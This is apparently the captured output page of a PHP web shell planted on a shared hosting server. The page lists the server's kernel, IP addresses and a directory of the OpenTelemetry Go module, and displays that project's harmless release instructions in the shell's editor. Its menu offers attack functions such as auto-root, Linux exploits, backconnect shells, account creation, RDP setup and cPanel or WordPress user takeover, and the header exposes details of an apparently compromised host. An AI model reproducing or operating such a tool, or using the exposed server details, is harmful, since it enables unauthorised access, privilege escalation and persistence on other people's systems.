Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
go.opentelemetry.io /
otel@v1.17.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
attribute
[ DIR ]
dr-xr-xr-x
baggage
[ DIR ]
dr-xr-xr-x
codes
[ DIR ]
dr-xr-xr-x
exporters
[ DIR ]
dr-xr-xr-x
internal
[ DIR ]
dr-xr-xr-x
propagation
[ DIR ]
dr-xr-xr-x
semconv
[ DIR ]
dr-xr-xr-x
.codespellignore
34
B
-r--r--r--
.codespellrc
252
B
-r--r--r--
.gitattributes
89
B
-r--r--r--
.gitignore
354
B
-r--r--r--
.gitmodules
147
B
-r--r--r--
.golangci.yml
11.07
KB
-r--r--r--
.lycheeignore
298
B
-r--r--r--
.markdownlint.yaml
309
B
-r--r--r--
CHANGELOG.md
180.76
KB
-r--r--r--
CODEOWNERS
533
B
-r--r--r--
CONTRIBUTING.md
19.7
KB
-r--r--r--
LICENSE
11.09
KB
-r--r--r--
Makefile
9.47
KB
-r--r--r--
README.md
5.52
KB
-r--r--r--
RELEASING.md
5.61
KB
-r--r--r--
VERSIONING.md
10.73
KB
-r--r--r--
doc.go
1.46
KB
-r--r--r--
error_handler.go
1.37
KB
-r--r--r--
get_main_pkgs.sh
1.22
KB
-r--r--r--
go.mod
519
B
-r--r--r--
go.sum
1.43
KB
-r--r--r--
handler.go
1.91
KB
-r--r--r--
handler_test.go
1.1
KB
-r--r--r--
internal_logging.go
867
B
-r--r--r--
internal_logging_test.go
825
B
-r--r--r--
metric.go
2.14
KB
-r--r--r--
metric_test.go
1.25
KB
-r--r--r--
propagation.go
1.13
KB
-r--r--r--
requirements.txt
17
B
-r--r--r--
trace.go
1.58
KB
-r--r--r--
trace_test.go
1.13
KB
-r--r--r--
verify_examples.sh
2.33
KB
-r--r--r--
version.go
759
B
-r--r--r--
version_test.go
1.19
KB
-r--r--r--
versions.yaml
2.42
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RELEASING.md
# Release Process ## Semantic Convention Generation New versions of the [OpenTelemetry Semantic Conventions] mean new versions of the `semconv` package need to be generated. The `semconv-generate` make target is used for this. 1. Checkout a local copy of the [OpenTelemetry Semantic Conventions] to the desired release tag. 2. Pull the latest `otel/semconvgen` image: `docker pull otel/semconvgen:latest` 3. Run the `make semconv-generate ...` target from this repository. For example, ```sh export TAG="v1.21.0" # Change to the release version you are generating. export OTEL_SEMCONV_REPO="/absolute/path/to/opentelemetry/semantic-conventions" docker pull otel/semconvgen:latest make semconv-generate # Uses the exported TAG and OTEL_SEMCONV_REPO. ``` This should create a new sub-package of [`semconv`](./semconv). Ensure things look correct before submitting a pull request to include the addition. ## Breaking changes validation You can run `make gorelease` that runs [gorelease](https://pkg.go.dev/golang.org/x/exp/cmd/gorelease) to ensure that there are no unwanted changes done in the public API. You can check/report problems with `gorelease` [here](https://golang.org/issues/26420). ## Pre-Release First, decide which module sets will be released and update their versions in `versions.yaml`. Commit this change to a new branch. Update go.mod for submodules to depend on the new release which will happen in the next step. 1. Run the `prerelease` make target. It creates a branch `prerelease_<module set>_<new tag>` that will contain all release changes. ``` make prerelease MODSET=<module set> ``` 2. Verify the changes. ``` git diff ...prerelease_<module set>_<new tag> ``` This should have changed the version for all modules to be `<new tag>`. If these changes look correct, merge them into your pre-release branch: ```go git merge prerelease_<module set>_<new tag> ``` 3. Update the [Changelog](./CHANGELOG.md). - Make sure all relevant changes for this release are included and are in language that non-contributors to the project can understand. To verify this, you can look directly at the commits since the `<last tag>`. ``` git --no-pager log --pretty=oneline "<last tag>..HEAD" ``` - Move all the `Unreleased` changes into a new section following the title scheme (`[<new tag>] - <date of release>`). - Update all the appropriate links at the bottom. 4. Push the changes to upstream and create a Pull Request on GitHub. Be sure to include the curated changes from the [Changelog](./CHANGELOG.md) in the description. ## Tag Once the Pull Request with all the version changes has been approved and merged it is time to tag the merged commit. ***IMPORTANT***: It is critical you use the same tag that you used in the Pre-Release step! Failure to do so will leave things in a broken state. As long as you do not change `versions.yaml` between pre-release and this step, things should be fine. ***IMPORTANT***: [There is currently no way to remove an incorrectly tagged version of a Go module](https://github.com/golang/go/issues/34189). It is critical you make sure the version you push upstream is correct. [Failure to do so will lead to minor emergencies and tough to work around](https://github.com/open-telemetry/opentelemetry-go/issues/331). 1. For each module set that will be released, run the `add-tags` make target using the `<commit-hash>` of the commit on the main branch for the merged Pull Request. ``` make add-tags MODSET=<module set> COMMIT=<commit hash> ``` It should only be necessary to provide an explicit `COMMIT` value if the current `HEAD` of your working directory is not the correct commit. 2. Push tags to the upstream remote (not your fork: `github.com/open-telemetry/opentelemetry-go.git`). Make sure you push all sub-modules as well. ``` git push upstream <new tag> git push upstream <submodules-path/new tag> ... ``` ## Release Finally create a Release for the new `<new tag>` on GitHub. The release body should include all the release notes from the Changelog for this release. ## Verify Examples After releasing verify that examples build outside of the repository. ``` ./verify_examples.sh ``` The script copies examples into a different directory removes any `replace` declarations in `go.mod` and builds them. This ensures they build with the published release, not the local copy. ## Post-Release ### Contrib Repository Once verified be sure to [make a release for the `contrib` repository](https://github.com/open-telemetry/opentelemetry-go-contrib/blob/main/RELEASING.md) that uses this release. ### Website Documentation Update the [Go instrumentation documentation] in the OpenTelemetry website under [content/en/docs/instrumentation/go]. Importantly, bump any package versions referenced to be the latest one you just released and ensure all code examples still compile and are accurate. [OpenTelemetry Semantic Conventions]: https://github.com/open-telemetry/semantic-conventions [Go instrumentation documentation]: https://opentelemetry.io/docs/instrumentation/go/ [content/en/docs/instrumentation/go]: https://github.com/open-telemetry/opentelemetry.io/tree/main/content/en/docs/instrumentation/go ### Demo Repository Bump the dependencies in the following Go services: - [`accountingservice`](https://github.com/open-telemetry/opentelemetry-demo/tree/main/src/accountingservice) - [`checkoutservice`](https://github.com/open-telemetry/opentelemetry-demo/tree/main/src/checkoutservice) - [`productcatalogservice`](https://github.com/open-telemetry/opentelemetry-demo/tree/main/src/productcatalogservice)
Close